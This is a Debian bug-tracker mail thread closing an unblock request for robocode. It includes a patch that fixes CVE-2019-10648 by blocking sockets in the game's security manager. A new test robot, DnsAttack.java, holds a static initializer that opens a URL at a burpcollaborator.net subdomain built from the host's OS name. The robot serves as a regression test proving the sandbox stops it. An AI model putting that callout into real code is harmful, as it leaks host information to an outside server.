Bug#926688: marked as done (unblock: robocode/1.9.3.3-2)

Tue, 09 Apr 2019 01:39:54 -0700 

Your message dated Tue, 09 Apr 2019 08:37:13 +0000
with message-id <[email protected]>
and subject line unblock robocode
has caused the Debian Bug report #926688,
regarding unblock: robocode/1.9.3.3-2
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
926688: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=926688
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message --- 
Package: release.debian.org
Severity: normal
User: [email protected]
Usertags: unblock

Please unblock package robocode

Robocode in Buster is affected by CVE-2019-10648. The fix applied
cleanly and all tests pass. This is Debian bug 926088.

Thank you.

unblock robocode/1.9.3.3-2

-- System Information:
Debian Release: buster/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-8-amd64 (SMP w/4 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), 
LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: unable to detect

diff -Nru robocode-1.9.3.3/debian/changelog robocode-1.9.3.3/debian/changelog
--- robocode-1.9.3.3/debian/changelog   2018-09-13 13:52:33.000000000 +0200
+++ robocode-1.9.3.3/debian/changelog   2019-04-08 00:13:19.000000000 +0200
@@ -1,3 +1,13 @@
+robocode (1.9.3.3-2) unstable; urgency=medium
+
+  * Fix CVE-2019-10648:
+    Robocode allows remote attackers to cause external service interaction
+    (DNS), as demonstrated by a query for a unique subdomain name within an
+    attacker-controlled DNS zone, because of a .openStream call within
+    java.net.URL. (Closes: #926088)
+
+ -- Markus Koschany <[email protected]>  Mon, 08 Apr 2019 00:13:19 +0200
+
 robocode (1.9.3.3-1) unstable; urgency=medium
 
   * New upstream version 1.9.3.3.
diff -Nru robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch 
robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch
--- robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch        1970-01-01 
01:00:00.000000000 +0100
+++ robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch        2019-04-08 
00:13:19.000000000 +0200
@@ -0,0 +1,235 @@
+From: Markus Koschany <[email protected]>
+Date: Mon, 8 Apr 2019 00:11:33 +0200
+Subject: CVE-2019-10648
+
+Bug-Debian: https://bugs.debian.org/926088
+Origin: 
https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd
+---
+ .../host/security/RobocodeSecurityManager.java     | 26 ++++++++++--
+ .../src/main/java/tested/robots/DnsAttack.java     | 18 +++++++++
+ .../test/robots/TestConstructorHttpAttack.java     | 11 +++---
+ .../sf/robocode/test/robots/TestHttpAttack.java    | 11 +++---
+ .../robots/TestStaticConstructorDnsAttack.java     | 46 ++++++++++++++++++++++
+ 5 files changed, 96 insertions(+), 16 deletions(-)
+ create mode 100644 
robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+ create mode 100644 
robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+
+diff --git 
a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
 
b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+index bc4c85a..ebd23e9 100644
+--- 
a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
++++ 
b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+@@ -12,7 +12,9 @@ import net.sf.robocode.host.IHostedThread;
+ import net.sf.robocode.host.IThreadManager;
+ import net.sf.robocode.io.RobocodeProperties;
+ 
++import java.net.SocketPermission;
+ import java.security.AccessControlException;
++import java.security.Permission;
+ 
+ 
+ /**
+@@ -49,7 +51,6 @@ public class RobocodeSecurityManager extends SecurityManager 
{
+               }
+ 
+               Thread c = Thread.currentThread();
+-
+               if (isSafeThread(c)) {
+                       return;
+               }
+@@ -84,7 +85,7 @@ public class RobocodeSecurityManager extends SecurityManager 
{
+                       if (robotProxy != null) {
+                               robotProxy.punishSecurityViolation(message);
+                       }
+-                      throw new AccessControlException(message);
++                      throw new SecurityException(message);
+               }
+       }
+ 
+@@ -94,7 +95,6 @@ public class RobocodeSecurityManager extends SecurityManager 
{
+                       return;
+               }
+               Thread c = Thread.currentThread();
+-
+               if (isSafeThread(c)) {
+                       return;
+               }
+@@ -123,9 +123,27 @@ public class RobocodeSecurityManager extends 
SecurityManager {
+                       String message = "Robots are only allowed to create up 
to 5 threads!";
+ 
+                       robotProxy.punishSecurityViolation(message);
+-                      throw new AccessControlException(message);
++                      throw new SecurityException(message);
+               }
+       }
++      
++    public void checkPermission(Permission perm) {
++              if (RobocodeProperties.isSecurityOff()) {
++                      return;
++              }
++              Thread c = Thread.currentThread();
++              if (isSafeThread(c)) {
++                      return;
++              }
++        super.checkPermission(perm);
++
++        if (perm instanceof SocketPermission) {
++              IHostedThread robotProxy = 
threadManager.getLoadedOrLoadingRobotProxy(c);
++              String message = "Using socket is not allowed";
++              robotProxy.punishSecurityViolation(message);
++            throw new SecurityException(message);
++        }
++    }
+ 
+       private boolean isSafeThread(Thread c) {
+               return threadManager.isSafeThread(c);
+diff --git a/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java 
b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+new file mode 100644
+index 0000000..701e5d8
+--- /dev/null
++++ b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+@@ -0,0 +1,18 @@
++package tested.robots;
++
++public class DnsAttack extends robocode.Robot {
++      static {
++              try {
++                      new java.net.URL("http://"; + 
System.getProperty("os.name").replaceAll(" ", ".")
++                                      + 
".randomsubdomain.burpcollaborator.net").openStream();
++              } catch (Exception e) {
++              }
++      }
++
++      public void run() {
++              for (;;) {
++                      ahead(100);
++                      back(100);
++              }
++      }
++}
+diff --git 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+index 8d7b1d7..7930237 100755
+--- 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
++++ 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+@@ -19,7 +19,7 @@ import robocode.control.events.TurnEndedEvent;
+ public class TestConstructorHttpAttack extends RobocodeTestBed {
+ 
+       private boolean messagedInitialization;
+-      private boolean messagedAccessDenied;
++      private boolean securityExceptionOccurred;
+       
+       @Override
+       public String getRobotNames() {
+@@ -36,20 +36,19 @@ public class TestConstructorHttpAttack extends 
RobocodeTestBed {
+                       messagedInitialization = true;  
+               }       
+ 
+-              if (out.contains("access denied (java.net.SocketPermission")
+-                              || out.contains("access denied 
(\"java.net.SocketPermission\"")) {
+-                      messagedAccessDenied = true;    
++              if (out.contains("java.lang.SecurityException:")) {
++                      securityExceptionOccurred = true;       
+               }       
+       }
+ 
+       @Override
+       protected void runTeardown() {
+               Assert.assertTrue("Error during initialization", 
messagedInitialization);
+-              Assert.assertTrue("HTTP connection is not allowed", 
messagedAccessDenied);
++              Assert.assertTrue("Socket connection is not allowed", 
securityExceptionOccurred);
+       }
+ 
+       @Override
+       protected int getExpectedErrors() {
+-              return hasJavaNetURLPermission ? 3 : 2; // Security error must 
be reported as an error
++              return 2;
+       }
+ }
+diff --git 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+index 770fb49..06d3bcb 100755
+--- 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
++++ 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+@@ -18,7 +18,7 @@ import robocode.control.events.TurnEndedEvent;
+  */
+ public class TestHttpAttack extends RobocodeTestBed {
+ 
+-      private boolean messagedAccessDenied;
++      private boolean securityExceptionOccurred;
+       
+       @Override
+       public String getRobotNames() {
+@@ -31,19 +31,18 @@ public class TestHttpAttack extends RobocodeTestBed {
+ 
+               final String out = 
event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
+ 
+-              if (out.contains("access denied (java.net.SocketPermission")
+-                              || out.contains("access denied 
(\"java.net.SocketPermission\"")) {
+-                      messagedAccessDenied = true;    
++              if (out.contains("java.lang.SecurityException:")) {
++                      securityExceptionOccurred = true;       
+               }       
+       }
+ 
+       @Override
+       protected void runTeardown() {
+-              Assert.assertTrue("HTTP connection is not allowed", 
messagedAccessDenied);
++              Assert.assertTrue("Socket connection is not allowed", 
securityExceptionOccurred);
+       }
+ 
+       @Override
+       protected int getExpectedErrors() {
+-              return hasJavaNetURLPermission ? 2 : 1; // Security error must 
be reported as an error. Java 8 reports two errors.
++              return 1;
+       }
+ }
+diff --git 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+new file mode 100644
+index 0000000..bf62373
+--- /dev/null
++++ 
b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+@@ -0,0 +1,46 @@
++/**
++ * Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
++ * All rights reserved. This program and the accompanying materials
++ * are made available under the terms of the Eclipse Public License v1.0
++ * which accompanies this distribution, and is available at
++ * https://robocode.sourceforge.io/license/epl-v10.html
++ */
++package net.sf.robocode.test.robots;
++
++import net.sf.robocode.test.helpers.RobocodeTestBed;
++import org.junit.Assert;
++import robocode.control.events.TurnEndedEvent;
++
++/**
++ * @author Flemming N. Larsen (original)
++ */
++public class TestStaticConstructorDnsAttack extends RobocodeTestBed {
++
++      private boolean securityExceptionOccurred;
++      
++      @Override
++      public String getRobotNames() {
++              return "tested.robots.DnsAttack,sample.Target";
++      }
++
++      @Override
++      public void onTurnEnded(TurnEndedEvent event) {
++              super.onTurnEnded(event);
++
++              final String out = 
event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
++
++              if (out.contains("SYSTEM: Using socket is not allowed")) {
++                      securityExceptionOccurred = true;       
++              }       
++      }
++
++      @Override
++      protected void runTeardown() {
++              Assert.assertTrue("Socket connection is not allowed", 
securityExceptionOccurred);
++      }
++
++      @Override
++      protected int getExpectedErrors() {
++              return 1;
++      }
++}
diff -Nru robocode-1.9.3.3/debian/patches/series 
robocode-1.9.3.3/debian/patches/series
--- robocode-1.9.3.3/debian/patches/series      2018-09-13 13:52:33.000000000 
+0200
+++ robocode-1.9.3.3/debian/patches/series      2019-04-08 00:13:19.000000000 
+0200
@@ -1,3 +1,4 @@
 showJavaDocumentation.patch
 maven-assembly.patch
 ecj.patch
+CVE-2019-10648.patch

--- End Message ---
--- Begin Message --- 
Unblocked robocode.

--- End Message ---

Reply via email to